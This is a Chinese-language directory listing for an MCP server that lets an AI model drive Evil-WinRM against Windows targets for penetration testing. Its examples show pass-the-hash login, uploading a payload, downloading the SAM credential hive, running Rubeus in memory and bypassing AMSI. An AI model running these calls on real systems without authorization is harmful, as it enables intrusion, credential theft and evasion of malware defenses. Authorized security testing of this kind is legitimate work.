Token导航 LogoToken导航TokenDH.com
Sec Evil Winrm MCP logo
安全风控未说明官方级别未说明来源级核验

Sec Evil Winrm MCP

MCP Server

一个通过SSH连接到Kali Linux主机,使用Evil-WinRM对Windows目标执行命令的MCP服务器,适用于渗透测试和Windows后渗透任务。

工具数

12

提示词数

0

GitHub Stars

0

资源数

0
渗透测试命令执行JavaScriptClaudeClaude

安装说明

本站只整理中文说明和来源信息,不托管安装包,也不代用户安装。

作者 / 组织

schwarztim

提供方

schwarztim

最后核验

2026/5/17 20:22

快速接入

先看主来源和安装命令,再打开仓库或文档;下面只保留这个条目的关键接入事实。

详细介绍

邪恶的WinRM MCP服务器

MCP(模型上下文协议)服务器,为AI助手提供通过SSH向Kali Linux主机执行针对Windows目标的Evil WinRM命令的能力。

概述

邪恶的WinRM 是渗透测试的终极WinRM外壳。此MCP服务器封装了Evil WinRM,以启用人工智能辅助的Windows后利用和横向移动任务。

主要特点

  • 多种身份验证方法 -密码、NTLM哈希(传递哈希)和Kerberos
  • PowerShell执行 -在目标上运行任意PowerShell命令
  • 文件传输 -在Windows系统中上传和下载文件
  • 内存执行 -加载。NET程序集和DLL,无需触摸磁盘
  • AMSI旁路 -内置Bypass-4MSI功能
  • 服务列举 -列出具有权限分析的服务

建筑

AI Assistant  MCP Server  SSH  Kali Linux  Evil-WinRM  Windows Target

MCP服务器在本地运行,并通过SSH在远程Kali Linux主机上执行Evil WinRM命令,然后通过WinRM(端口5985/5986)连接到Windows目标。

先决条件

  • Node.js 18.x或更高
  • Kali Linux 安装了Evil WinRM(gem install evil-winrm)
  • SSH访问 从MCP服务器主机到Kali Linux
  • 网络接入 从Kali到Windows目标(WinRM端口5985/5986)

安装

# Clone the repository
git clone https://github.com/schwarztim/sec-evil-winrm-mcp.git
cd sec-evil-winrm-mcp

# Install dependencies
npm install

# Build
npm run build

配置

环境变量

变量描述默认值
KALI_HOSTKali Linux主机名或IP地址kali
KALI_USERKali的SSH用户名kali
SSH_KEYSSH私钥路径(可选)-
EVILWINRM_DEFAULT_PORT默认WinRM端口5985

Claude桌面配置

添加到您的Claude桌面配置(~/.config/Claude/claude_desktop_config.json):

{
  "mcpServers": {
    "evil-winrm": {
      "command": "node",
      "args": ["/path/to/sec-evil-winrm-mcp/dist/index.js"],
      "env": {
        "KALI_HOST": "your-kali-host",
        "KALI_USER": "kali",
        "SSH_KEY": "/path/to/ssh/key"
      }
    }
  }
}

可用工具

会话管理

工具说明
evilwinrm_connect配置连接参数(主机、用户、密码/哈希、SSL、Kerberos)
evilwinrm_get_session查看当前会话配置
evilwinrm_clear_session清除会话参数
evilwinrm_test_connection测试与Kali的SSH连接并验证Evil WinRM安装

命令执行

工具说明
evilwinrm_exec在目标上执行PowerShell命令
evilwinrm_services列出Windows服务并分析权限

文件传输

工具说明
evilwinrm_upload将文件从Kali上传到目标
evilwinrm_download将文件从目标下载到Kali

高级功能

工具说明
evilwinrm_menu显示可用的Evil WinRM内置函数
evilwinrm_dll_loader通过SMB、本地路径或HTTP加载DLL
evilwinrm_invoke_binary执行。内存中的NET程序集
evilwinrm_bypass_amsi修补AMSI(反恶意软件扫描接口)保护

使用示例

使用密码的基本连接

1. evilwinrm_connect(host="192.168.1.100", user="administrator", password="P@ssw0rd")
2. evilwinrm_exec(command="whoami /all")
3. evilwinrm_exec(command="Get-Process | Select-Object -First 10")

通过哈希攻击

1. evilwinrm_connect(
     host="192.168.1.100",
     user="administrator",
     hash="aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0"
   )
2. evilwinrm_exec(command="hostname")

SSL/HTTPS连接(端口5986)

1. evilwinrm_connect(
     host="192.168.1.100",
     user="admin",
     password="secret",
     port="5986",
     ssl=true
   )

Kerberos认证

1. evilwinrm_connect(
     host="dc01.corp.local",
     user="admin",
     password="P@ssw0rd",
     realm="CORP.LOCAL"
   )

文件操作

# Upload a file
evilwinrm_upload(local_path="/tmp/payload.exe", remote_path="C:\\Windows\\Temp\\payload.exe")

# Download a file
evilwinrm_download(remote_path="C:\\Windows\\System32\\config\\SAM", local_path="/tmp/SAM")

内存执行

# First, configure with executables path
evilwinrm_connect(
  host="192.168.1.100",
  user="admin",
  password="secret",
  execs_path="/opt/tools/dotnet"
)

# Execute .NET assembly in memory
evilwinrm_invoke_binary(binary_name="Rubeus.exe", arguments="triage")

安全通知

此工具仅用于授权的安全测试和研究。

  • 测试前务必获得适当的书面授权
  • 仅在您拥有或明确允许测试的系统上使用
  • 遵循负责任的披露做法
  • 遵守所有适用的法律法规

未经授权访问计算机系统是非法的。作者不对误用此工具负责。

参考文献

许可证

MIT许可证-请参阅 许可证 了解详情。

目录标签

目录标签

渗透测试命令执行JavaScriptClaude本地部署Windows后渗透文件传输AMSI绕过

支持客户端

Claude

接入字段

传输方式(transport,传输协议)

未说明

鉴权方式(authType,认证方式)

none

工具数量(toolCount,工具数)

12

资源数量(resourceCount,资源数)

0

提示词数量(promptCount,提示词数)

0

权限和风险

未说明none部署方式未说明

接入前请确认传输方式、认证方式和部署位置,并根据实际工具能力限制访问范围。

安装前确认

不要直接授予不必要的文件、网络或账号权限;先核对安装命令和配置内容。

仍需确认:installCommand

来源信息

继续浏览同类 MCP